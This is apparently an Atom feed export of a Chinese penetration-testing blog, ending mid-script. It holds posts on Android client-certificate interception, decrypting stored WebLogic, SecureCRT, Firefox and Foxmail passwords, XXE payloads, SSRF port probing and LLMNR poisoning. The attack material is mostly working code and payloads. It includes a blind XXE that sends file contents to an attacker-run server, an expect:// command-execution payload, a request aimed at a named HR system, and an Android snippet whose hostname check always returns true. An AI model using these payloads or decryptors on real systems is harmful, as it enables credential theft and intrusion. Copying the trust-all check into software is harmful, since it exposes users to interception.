href="#安卓客户端" class="headerlink" title="安卓客户端"></a>安卓客户端</h3><!-- code --><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div></pre></td><td class="code"><pre><div class="line">try {</div><div class="line"> // 服务器端需要验证的客户端证书,其实就是客户端的keystore</div><div class="line"> KeyStore keyStore = KeyStore.getInstance("BKS");</div><div class="line"> // 客户端信任的服务器端证书</div><div class="line"> KeyStore trustStore = KeyStore.getInstance("BKS");</div><div class="line"></div><div class="line"> //读取证书</div><div class="line"> InputStream ksIn = getResources().getAssets().open("client.bks");</div><div class="line"> InputStream tsIn = getResources().getAssets().open("truststore.bks");</div><div class="line"></div><div class="line"> //加载证书</div><div class="line"> keyStore.load(ksIn,"123456".toCharArray());</div><div class="line"> trustStore.load(tsIn,"123456".toCharArray());</div><div class="line"> IOUtils.close(ksIn);</div><div class="line"> IOUtils.close(tsIn);</div><div class="line"></div><div class="line"> //初始化SSLContext</div><div class="line"> SSLContext sslContext = SSLContext.getInstance("TLS");</div><div class="line"> TrustManagerFactory trustManagerFactory = TrustManagerFactory.getInstance("X509");</div><div class="line"> KeyManagerFactory keyManagerFactory = KeyManagerFactory.getInstance("X509");</div><div class="line"> trustManagerFactory.init(trustStore);</div><div class="line"> keyManagerFactory.init(keyStore, "123456".toCharArray());</div><div class="line"> sslContext.init(keyManagerFactory.getKeyManagers(), trustManagerFactory.getTrustManagers(), null);</div><div class="line"></div><div class="line"> //通过HttpsURLConnection设置链接</div><div class="line"> SSLSocketFactory socketFactory = sslContext.getSocketFactory();</div><div class="line"> HttpsURLConnection.setDefaultSSLSocketFactory(socketFactory);</div><div class="line"></div><div class="line"> URL url = new URL(url);</div><div class="line"> HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();</div><div class="line"> //设置ip授权认证:如果已经安装该证书,可以不设置,否则需要设置</div><div class="line"> conn.setHostnameVerifier(new HostnameVerifier() {</div><div class="line"> @Override</div><div class="line"> public boolean verify(String hostname, SSLSession session) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line"> });</div><div class="line"> InputStream inputStream = conn.getInputStream();</div><div class="line"> String content = getString(inputStream);</div><div class="line"> IOUtils.close(inputStream);</div><div class="line"> System.out.println(content);</div><div class="line"></div><div class="line">} catch (Exception e) {</div><div class="line"> e.printStackTrace();</div><div class="line">}</div></pre></td></tr></table></figure><h2 id="Burp-代理"><a href="#Burp-代理" class="headerlink" title="Burp 代理"></a>Burp 代理</h2><p>提取app中的客户端证书,在Burp的Project options -> SSL选项卡Client SSL Certificates栏处导入,之后Burp便可直接访问目标站点。</p><p><img src="https://i.imgur.com/CHvcAzX.png" alt=""></p><p>app客户端依旧使用Xposed JustTrustMe插件绕过服务器证书校验。</p>]]></content>
<summary type="html">
<ul>
<li>JKS:数字证书库。JKS里有KeyEntry和CertEntry,在库里的每个Entry都是靠别名(alias)来识别的。</li>
<li>P12:是PKCS12的缩写。同样是一个存储私钥的证书库,由.jks文件导出的,用户在PC平台安装,用于标示用户的身份
</summary>
</entry>
<entry>
<title>Password Crack Tips</title>
<link href="http://ruos.org/2018/05/11/Password-Crack-Tips/"/>
<id>http://ruos.org/2018/05/11/Password-Crack-Tips/</id>
<published>2018-05-11T03:05:15.000Z</published>
<updated>2018-05-11T03:19:58.312Z</updated>
<content type="html"><![CDATA[<h1 id="常用软件密码解密"><a href="#常用软件密码解密" class="headerlink" title="常用软件密码解密"></a>常用软件密码解密</h1><h2 id="Weblogic"><a href="#Weblogic" class="headerlink" title="Weblogic"></a>Weblogic</h2><ol><li>登陆密码</li><li>数据库配置文件(Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)</li></ol><figure class="highlight java"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> weblogic.security.internal.*;</div><div class="line"><span class="keyword">import</span> weblogic.security.internal.encryption.*;</div><div class="line"></div><div class="line"><span class="comment">/**</span></div><div class="line"><span class="comment">*</span></div><div class="line"><span class="comment">* 密码文件 Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties</span></div><div class="line"><span class="comment">* 密钥文件 Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat</span></div><div class="line"><span class="comment">*/</span></div><div class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">WebLogicDecryptor</span> </span>{</div><div class="line"><span class="keyword">private</span> <span class="keyword">static</span> ClearOrEncryptedService ces;</div><div class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</div><div class="line"><span class="keyword">if</span> (args.length < <span class="number">1</span>) {</div><div class="line"><span class="keyword">throw</span> <span class="keyword">new</span> Exception(<span class="string">"must set [domainDir] [encryptStr]"</span>);</div><div class="line">}</div><div class="line">ces = <span class="keyword">new</span> ClearOrEncryptedService(</div><div class="line">SerializedSystemIni.getEncryptionService(args[<span class="number">0</span>])); <span class="comment">// your_domain</span></div><div class="line">System.out.println(<span class="string">"Decrypted: "</span> + ces.decrypt(args[<span class="number">1</span>])); <span class="comment">// {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8= 12id9*@YNs0_q2dxwe</span></div><div class="line">}</div><div class="line">}</div></pre></td></tr></table></figure><a id="more"></a><ol><li>设置环境变量<br><code>base_domain\bin\setDomainEnv.cmd</code></li><li>编译<br><code>javac WebLogicDecryptor.java</code></li><li>运行<br><code>java WebLogicDecryptor D:\Server\Oracle\Middleware\user_projects\domains\base_domain {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=</code></li></ol><p><a href="https://github.com/NetSPI/WebLogicPasswordDecryptor" target="_blank" rel="external">https://github.com/NetSPI/WebLogicPasswordDecryptor</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">javac -classpath bcprov-jdk15on-1.58.jar WebLogicPasswordDecryptor.java</div><div class="line">java -Djava.ext.dirs=. WebLogicPasswordDecryptor "./SerializedSystemIni.dat" "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="</div></pre></td></tr></table></figure></p><p>补丁安装<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">./bsu.cmd -prod_dir=c:\Oracle\Middleware\wlserver_10.3 -status=applied -verbose -view</div><div class="line">./bsu.sh -view -status=downloaded -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir</div><div class="line">./bsu.sh -install -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patchlist=GFWX -verbose</div></pre></td></tr></table></figure></p><h2 id="Firefox"><a href="#Firefox" class="headerlink" title="Firefox"></a>Firefox</h2><p>nss3.dll路径<br>C:\Program Files (x86)\Mozilla Firefox\nss3.dll</p><p>火狐Profiles地址<br>C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zvu7t3k2.default<br>cert8.db<br>key3.db<br>logins.json</p><p><code>ff_decrypt.py profilesfolder</code></p><h2 id="SecureCRT"><a href="#SecureCRT" class="headerlink" title="SecureCRT"></a>SecureCRT</h2><p><a href="https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py" target="_blank" rel="external">https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py</a></p><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> Blowfish</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">decrypt</span><span class="params">(password)</span> :</span></div><div class="line"> c1 = Blowfish.new(<span class="string">'5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'</span>.replace(<span class="string">' '</span>,<span class="string">''</span>).decode(<span class="string">'hex'</span>), Blowfish.MODE_CBC, <span class="string">'\x00'</span>*<span class="number">8</span>)</div><div class="line"> c2 = Blowfish.new(<span class="string">'24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'</span>.replace(<span class="string">' '</span>,<span class="string">''</span>).decode(<span class="string">'hex'</span>), Blowfish.MODE_CBC, <span class="string">'\x00'</span>*<span class="number">8</span>)</div><div class="line"> padded = c1.decrypt(c2.decrypt(password.decode(<span class="string">'hex'</span>))[<span class="number">4</span>:<span class="number">-4</span>])</div><div class="line"> p = <span class="string">''</span></div><div class="line"> <span class="keyword">while</span> padded[:<span class="number">2</span>] != <span class="string">'\x00\x00'</span> :</div><div class="line"> p += padded[:<span class="number">2</span>]</div><div class="line"> padded = padded[<span class="number">2</span>:]</div><div class="line"> <span class="keyword">return</span> p.decode(<span class="string">'UTF-16'</span>)</div><div class="line"></div><div class="line"><span class="keyword">print</span> decrypt(<span class="string">"xxx240f919a7a477198d1f6ce3a1fbf5a3671c82483f34bed1304c7ebe8de345"</span>);</div></pre></td></tr></table></figure><h2 id="Foxmail"><a href="#Foxmail" class="headerlink" title="Foxmail"></a>Foxmail</h2><p>版本小于 7.0 Foxmail\Storage\test@domain.com\Accounts\Account.stg<br>版本大于 7.0 Account.cfg</p><ol><li>Account.stg 文件可用工具破解。</li><li>Account.cfg 格式的将Account目录复制到同版本Storage目录下,修改FMStorage.list文件添加新邮箱 Storage\test@domain.com\,启动客户端用星号密码查看器查看密码。</li></ol><h2 id="Outlook"><a href="#Outlook" class="headerlink" title="Outlook"></a>Outlook</h2>]]></content>
<summary type="html">
<h1 id="常用软件密码解密"><a href="#常用软件密码解密" class="headerlink" title="常用软件密码解密"></a>常用软件密码解密</h1><h2 id="Weblogic"><a href="#Weblogic" class="headerlink" title="Weblogic"></a>Weblogic</h2><ol>
<li>登陆密码</li>
<li>数据库配置文件(Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> weblogic.security.internal.*;</div><div class="line"><span class="keyword">import</span> weblogic.security.internal.encryption.*;</div><div class="line"></div><div class="line"><span class="comment">/**</span></div><div class="line"><span class="comment">*</span></div><div class="line"><span class="comment">* 密码文件 Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties</span></div><div class="line"><span class="comment">* 密钥文件 Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat</span></div><div class="line"><span class="comment">*/</span></div><div class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">WebLogicDecryptor</span> </span>&#123;</div><div class="line"> <span class="keyword">private</span> <span class="keyword">static</span> ClearOrEncryptedService ces;</div><div class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</div><div class="line"> <span class="keyword">if</span> (args.length &lt; <span class="number">1</span>) &#123;</div><div class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> Exception(<span class="string">"must set [domainDir] [encryptStr]"</span>);</div><div class="line"> &#125;</div><div class="line"> ces = <span class="keyword">new</span> ClearOrEncryptedService(</div><div class="line"> SerializedSystemIni.getEncryptionService(args[<span class="number">0</span>])); <span class="comment">// your_domain</span></div><div class="line"> System.out.println(<span class="string">"Decrypted: "</span> + ces.decrypt(args[<span class="number">1</span>])); <span class="comment">// &#123;AES&#125;9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8= 12id9*@YNs0_q2dxwe</span></div><div class="line"> &#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
</summary>
</entry>
<entry>
<title>XXE</title>
<link href="http://ruos.org/2018/05/11/XXE/"/>
<id>http://ruos.org/2018/05/11/XXE/</id>
<published>2018-05-11T03:01:33.000Z</published>
<updated>2018-05-11T03:20:20.131Z</updated>
<content type="html"><![CDATA[<h1 id="XML-Injection"><a href="#XML-Injection" class="headerlink" title="XML Injection"></a>XML Injection</h1><h2 id="XML-External-Entity-XXE-Processing"><a href="#XML-External-Entity-XXE-Processing" class="headerlink" title="XML External Entity (XXE) Processing"></a>XML External Entity (XXE) Processing</h2><p>访问本地资源</p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span></div><div class="line">$xml=<span class="string"><<<XML</span></div><div class="line"><span class="string"><?xml version="1.0" encoding="ISO-8859-1"?></span></div><div class="line"><span class="string"><!DOCTYPE foo [ </span></div><div class="line"><span class="string"> <!ELEMENT foo ANY ></span></div><div class="line"><span class="string"> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo></span></div><div class="line"><span class="string">XML;</span></div><div class="line">$data = simplexml_load_string($xml);</div><div class="line">print_r($data);</div><div class="line"><span class="meta">?></span></div></pre></td></tr></table></figure><p>远程代码执行,需要php开启expect</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta"><?</span>xml version=<span class="string">"1.0"</span> encoding=<span class="string">"ISO-8859-1"</span><span class="meta">?></span></span></div><div class="line"><span class="meta"><!DOCTYPE foo [ </span></div><div class="line"><span class="meta"> <!ELEMENT foo ANY ></span></div><div class="line"><span class="meta"> <!ENTITY xxe SYSTEM "expect://id" >]></span></div><div class="line"><span class="tag"><<span class="name">creds</span>></span></div><div class="line"> <span class="tag"><<span class="name">user</span>></span>&xxe;<span class="tag"></<span class="name">user</span>></span></div><div class="line"> <span class="tag"><<span class="name">pass</span>></span>mypass<span class="tag"></<span class="name">pass</span>></span></div><div class="line"><span class="tag"></<span class="name">creds</span>></span></div></pre></td></tr></table></figure><a id="more"></a><p>检测内网</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0" ?></div><div class="line"><!DOCTYPE ANY [</div><div class="line"><!ENTITY xxe SYSTEM "http://192.168.1.2:8080/data" >]><foo>&xxe;</foo></div></pre></td></tr></table></figure><p>Tag Injection<br>内容注入</p><h4 id="Blind-XXE"><a href="#Blind-XXE" class="headerlink" title="Blind XXE"></a>Blind XXE</h4><p>嵌套远程实体</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0"?> </div><div class="line"><!DOCTYPE ANY[ </div><div class="line"><!ENTITY % file SYSTEM "file:///C:/1.txt"> </div><div class="line"><!ENTITY % remote SYSTEM "http://192.168.150.1/evil.txt"> </div><div class="line">%remote; </div><div class="line">%all; </div><div class="line">%send; </div><div class="line">]></div></pre></td></tr></table></figure><p>evil.txt<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.150.1/1.php?file=%file;'>"></div></pre></td></tr></table></figure></p><h3 id="Testing-for-XML-Injection"><a href="#Testing-for-XML-Injection" class="headerlink" title="Testing for XML Injection"></a>Testing for XML Injection</h3><p>打破xml格式使其报错</p><p>If ‘&’ is not encoded itself with &, it could be used to test XML injection. </p><p><a href="https://github.com/xmendez/wfuzz/" target="_blank" rel="external">https://github.com/xmendez/wfuzz/</a></p><h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">POST /hrss/dorado/smartweb2.RPC.d?__rpc=true</div><div class="line"></div><div class="line">__type=updateData&__viewInstanceId=dorado.tabselfservice.FindBackStaticPWSvNewForReset~dorado.common.BaseViewModel&__xml=<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:////test" >]><foo>&xxe;</foo>&1518403736067</div></pre></td></tr></table></figure><p>回显Payload<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><!DOCTYPE ANY[</span></div><div class="line"><span class="meta"><!ENTITY xxe SYSTEM "/">]></span></div><div class="line"><span class="tag"><<span class="name">rpc</span> <span class="attr">method</span>=<span class="string">"noteInputCount"</span>></span></div><div class="line"> <span class="tag"><<span class="name">ps</span>></span></div><div class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">name</span>=<span class="string">"user_code"</span>></span>1<span class="tag"></<span class="name">p</span>></span></div><div class="line"> <span class="tag"></<span class="name">ps</span>></span></div><div class="line"> <span class="tag"><<span class="name">vps</span>></span></div><div class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">name</span>=<span class="string">"DEFAULT_DATA_SOURCE"</span>></span>%26xxe;<span class="tag"></<span class="name">p</span>></span></div><div class="line"> <span class="tag"></<span class="name">vps</span>></span></div><div class="line"><span class="tag"></<span class="name">rpc</span>></span></div></pre></td></tr></table></figure></p><h2 id="SSRF-Server-Side-Request-Forgery"><a href="#SSRF-Server-Side-Request-Forgery" class="headerlink" title="SSRF (Server-Side Request Forgery)"></a>SSRF (Server-Side Request Forgery)</h2><p>内网端口探测</p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span></div><div class="line"><span class="comment">//端口探测</span></div><div class="line"><span class="keyword">if</span>(!$fp = fsockopen($host, intval($port), $errno, $errstr, <span class="number">5</span>)){</div><div class="line"><span class="keyword">echo</span> <span class="string">"$errno $errstr\n"</span>;</div><div class="line">}</div><div class="line"><span class="keyword">else</span>{</div><div class="line"><span class="keyword">echo</span> <span class="string">"Port open.\n"</span>;</div><div class="line"><span class="keyword">if</span>($fp){</div><div class="line">fclose($fp);</div><div class="line">}</div><div class="line">}</div><div class="line"><span class="meta">?></span></div></pre></td></tr></table></figure><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span></div><div class="line"><span class="comment">//访问网页</span></div><div class="line">$ch = curl_init();</div><div class="line">curl_setopt($ch, CURLOPT_URL, <span class="string">"http://www.example.com/"</span>);</div><div class="line">curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>);</div><div class="line"><span class="keyword">echo</span> curl_exec($ch);</div><div class="line">curl_close($ch);</div><div class="line"><span class="meta">?></span></div></pre></td></tr></table></figure><h2 id="XPath-injection"><a href="#XPath-injection" class="headerlink" title="XPath injection"></a>XPath injection</h2><p>XPath 使用路径表达式来选取 XML 文档中的节点或节点集。</p>]]></content>
<summary type="html">
<h1 id="XML-Injection"><a href="#XML-Injection" class="headerlink" title="XML Injection"></a>XML Injection</h1><h2 id="XML-External-Entity-XXE-Processing"><a href="#XML-External-Entity-XXE-Processing" class="headerlink" title="XML External Entity (XXE) Processing"></a>XML External Entity (XXE) Processing</h2><p>访问本地资源</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$xml=<span class="string">&lt;&lt;&lt;XML</span></div><div class="line"><span class="string">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span></div><div class="line"><span class="string">&lt;!DOCTYPE foo [ </span></div><div class="line"><span class="string"> &lt;!ELEMENT foo ANY &gt;</span></div><div class="line"><span class="string"> &lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</span></div><div class="line"><span class="string">XML;</span></div><div class="line">$data = simplexml_load_string($xml);</div><div class="line">print_r($data);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>远程代码执行,需要php开启expect</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?</span>xml version=<span class="string">"1.0"</span> encoding=<span class="string">"ISO-8859-1"</span><span class="meta">?&gt;</span></span></div><div class="line"><span class="meta">&lt;!DOCTYPE foo [ </span></div><div class="line"><span class="meta"> &lt;!ELEMENT foo ANY &gt;</span></div><div class="line"><span class="meta"> &lt;!ENTITY xxe SYSTEM "expect://id" &gt;]&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">creds</span>&gt;</span></div><div class="line"> <span class="tag">&lt;<span class="name">user</span>&gt;</span>&amp;xxe;<span class="tag">&lt;/<span class="name">user</span>&gt;</span></div><div class="line"> <span class="tag">&lt;<span class="name">pass</span>&gt;</span>mypass<span class="tag">&lt;/<span class="name">pass</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">creds</span>&gt;</span></div></pre></td></tr></table></figure>
</summary>
</entry>
<entry>
<title>名称欺骗中间人攻击</title>
<link href="http://ruos.org/2017/12/14/%E5%90%8D%E7%A7%B0%E6%AC%BA%E9%AA%97%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB/"/>
<id>http://ruos.org/2017/12/14/名称欺骗中间人攻击/</id>
<published>2017-12-14T01:29:00.000Z</published>
<updated>2017-12-14T01:33:22.032Z</updated>
<content type="html"><![CDATA[<h1 id="名称欺骗中间人攻击"><a href="#名称欺骗中间人攻击" class="headerlink" title="名称欺骗中间人攻击"></a>名称欺骗中间人攻击</h1><h3 id="LLMNR"><a href="#LLMNR" class="headerlink" title="LLMNR"></a>LLMNR</h3><p>Link-Local Multicast Name Resolution (LLMNR)<br>链路本地多播名称解析</p><p>当我们执行<code>ping WEBTST01</code>将会发送LLMNR请求解析WEBTST01。所有的LLMNR包将会发送到组播地址224.0.0.252 MAC:<code>01:00:5E:00:00:FC</code>,响应主机将单播回应查询。</p><p><img src="https://i.imgur.com/o1jbyP5.png" alt=""></p><h4 id="LLMNR-packet-header-structure"><a href="#LLMNR-packet-header-structure" class="headerlink" title="LLMNR packet header structure"></a>LLMNR packet header structure</h4><p><img src="https://i.imgur.com/VHUoWeu.png" alt=""></p><ul><li>ID - A 16-bit identifier assigned by the program that generates any kind of query.</li><li>QR - Query/Response.</li><li>OPCODE - A 4-bit field that specifies the kind of query in this message. This value is set by the originator of a query and copied * into the response. This specification defines the behavior of standard queries and responses (opcode value of zero). Future specifications may define the use of other opcodes with LLMNR.</li><li>C - Conflict.</li><li>TC - TrunCation.</li><li>T - Tentative.</li><li>Z - Reserved for future use.</li><li>RCODE - Response code.</li><li>QDCOUNT - An unsigned 16-bit integer specifying the number of entries in the question section.</li><li>ANCOUNT - An unsigned 16-bit integer specifying the number of resource records in the answer section.</li><li>NSCOUNT - An unsigned 16-bit integer specifying the number of name server resource records in the authority records section.</li><li>ARCOUNT - An unsigned 16-bit integer specifying the number of resource records in the additional records section.</li></ul><a id="more"></a><h4 id="LLMNR-Poison"><a href="#LLMNR-Poison" class="headerlink" title="LLMNR Poison"></a>LLMNR Poison</h4><p>基于名字解析的ip欺骗</p><p>Python模拟LLMNR响应Demo<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!python</span></div><div class="line"><span class="comment">#/usr/bin/env python</span></div><div class="line"></div><div class="line">__doc__ = <span class="string">"""</span></div><div class="line"><span class="string"> LLMNR Answer, by Her0in</span></div><div class="line"><span class="string">"""</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> socket, struct</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">LLMNR_Answer</span>:</span></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, addr)</span>:</span></div><div class="line"></div><div class="line"> self.IPADDR = addr</div><div class="line"> self.las = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</div><div class="line"> self.init_socket()</div><div class="line"> self.populate()</div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">populate</span><span class="params">(self)</span>:</span></div><div class="line"></div><div class="line"> self.AnswerData = (</div><div class="line"> <span class="string">"TID"</span> <span class="comment"># Tid</span></div><div class="line"> <span class="string">"\x80\x00"</span> <span class="comment"># Flags Query(0x0000)? or Response(0x8000) ?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Question</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Answer RRS</span></div><div class="line"> <span class="string">"\x00\x00"</span> <span class="comment"># Authority RRS</span></div><div class="line"> <span class="string">"\x00\x00"</span> <span class="comment"># Additional RRS</span></div><div class="line"> <span class="string">"LENGTH"</span> <span class="comment"># Question Name Length</span></div><div class="line"> <span class="string">"NAME"</span> <span class="comment"># Question Name</span></div><div class="line"> <span class="string">"\x00"</span> <span class="comment"># Question Name Null</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Query Type ,IPv4(0x0001)? or IPv6(0x001c)?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Class</span></div><div class="line"> <span class="string">"LENGTH"</span> <span class="comment"># Answer Name Length</span></div><div class="line"> <span class="string">"NAME"</span> <span class="comment"># Answer Name</span></div><div class="line"> <span 